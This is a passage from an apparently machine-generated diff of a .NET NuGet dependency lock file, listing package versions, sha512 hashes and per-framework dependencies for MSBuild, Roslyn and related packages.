"Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.192", "sha512": "sha512-pE/SD2N0+nDAU8BtTHqjyIhLM2L5Mb0NiO4hW0ybiv2I+BbK0JEaGtbKpeEmOvKT+5s2hds0gvk/GrAHhgcpdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "9.0.0", "sha512": "sha512-bYp2ksSR5uB6xqOa4NyD2gBOeFrc2n8FAWoh781MNMDcPjk1ysD7DNpv7r7sQOXfdFJT6F/syX7fN4lmUsn+RQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.5.0", "sha512": "sha512-La1NFQ7SVz1pVGEUnG15BQG26jJkRMCiitySBXLhuTYf9IG6eZ5j5UFjnM4EFKSVKbictRv+D/F0dQtsCiK9ag==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net471": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.12.6", "sha512": "sha512-YPtNsiLEPn3g3EcO+Kyr7fIdufg6wdzibzufclQYZjIDS80krFsYi2rTpeTmHtlCK0PhyLvxJAQZ3NecgJHTkg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis", "id": "Microsoft.CodeAnalysis", "version": "4.12.0", "sha512": "sha512-saGSG86irNb5MX0/7j0Lx2T0jSGQuqa6QlohBHBcTzObPyMunQZIuIWVXlEiKwcrcEQm4rtUg/5FW43s0dqH7Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net8.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net9.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.Analyzers", "id": "Microsoft.CodeAnalysis.Analyzers", "version": "3.3.4", "sha512": "sha512-I+Riw6/6WjNICydoiNpDjN/GGP7u4XsL6VsI9lG/OjFufH3flvSEy/fxNhGDVGwZWwq/5BlnqX+LH2dmheaPfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.Analyzers", "id": "Microsoft.CodeAnalysis.Analyzers", "version": "3.11.0", "sha512": "sha512-tP9SLzLK72XCExlh8KXfrKbU6ycmZL3ExGl/a3Ml7LNy2Uaam7gFjjUmdzyTYkMXTyckCHHpzx7bD6BMumh8Bg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.Common", "id": "Microsoft.CodeAnalysis.Common", "version": "4.12.0", "sha512": "sha512-83sYPF0SekVhecApCFXsLCsQL9qFzAl5ieCEqVb8Uo08nV34YD3cfq7FLv6EkhnAwPbP7ky19sAEEqYLDUrxWA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net462": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net47": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net471": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net472": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net48": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", 